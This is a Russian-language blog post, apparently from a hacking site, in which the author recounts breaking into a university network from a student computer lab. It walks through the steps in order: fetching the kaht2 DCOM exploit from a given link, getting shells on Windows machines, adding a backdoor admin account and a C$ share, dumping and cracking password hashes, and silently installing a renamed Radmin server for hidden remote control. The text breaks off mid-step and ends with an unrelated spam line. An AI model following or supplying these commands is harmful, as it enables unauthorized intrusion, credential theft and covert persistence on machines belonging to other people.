копирование и распостранение данной статьи запрещено. права на статью принадлежат её автору. данная статья несет чисто информативный харктер и не служит руководством к действию, а лишь показывает распостранные ошибки системных администраторов. passwords, logins and names are changed. краткое описание сети: сеть университета. сеть класса в, имеет доступ к internet через прокси сервер, содержит в себе компьютеры преподавателей, бухгалтерии, высшего руководства университета, студенческие классы и базы данных (зарплата, оценки, вступительные экзаменны). software: windows 2000 sp4 windows xp sp1 sp2, windows 2000 server. попав в компьютерный класс своего университета, я сразу решил проверить сеть на устойчивость и защищенность. для этого использовался самый примитивный набор hacktools и software. машины в компьютерном классе для студентов имели ограниченную учетную запись user типа пользователь. отсутствие возможностей по установке приложений не давало ограничения по запуску консольных приложений поэтому, открыв подставной бесплатный почтовый ящик, я скинул туда эксплоит kaht2 (kaht2.exe уязвимость в службе dcom (win 2000/xp) эксплоит kaht2.exe можно скачать по ссылке http://www.securitylab.ru/_exploits/kaht2.zip ) распаковав его на локальной машине, атакую соседние машины, получив шелл вида c:winntsystem32 провожу следующие действия net user hacker /add net localgroup администраторы hacker /add net share c=c: /add далее соединяемся с атакованной машиной на диск с и кидаем туда gethashes.exe (утилита из программы saminside ). с шелла запускаем gethashes.exe с параметром $local получаем локальные пароли зашифрованные hash функцией используя бесплатный сервис http://passcrack.spb.ru/ по восстановлению md5 hash получаем пароль локального администратора, который в нашем случае подходит к большинству машин компьютерного класса. распаковываем radmin устанавливаем на локальную машины имея права администратора, переписываем c:program files admin в произвольное место, заменяем r_server.exe на произвольное название на нашем примере это alg.exe. заливаем на взломанную машину в папку c:winntsystem32 c этой папки запускаем r_server /install r_server /port: 555 /save /silence r_server /pass: hacked /save /silence r_server /start после этого открываем на локальной машине regedit.exe подключаем сетевой реестр взломанной машины hkey_local_machinesystem adminv2.
футбольный магазин анапа
Comments on this entry (2 comments)
Enjoy this Post? You can discuss and share your opinion about it! Just do it over here.
Add Your Comment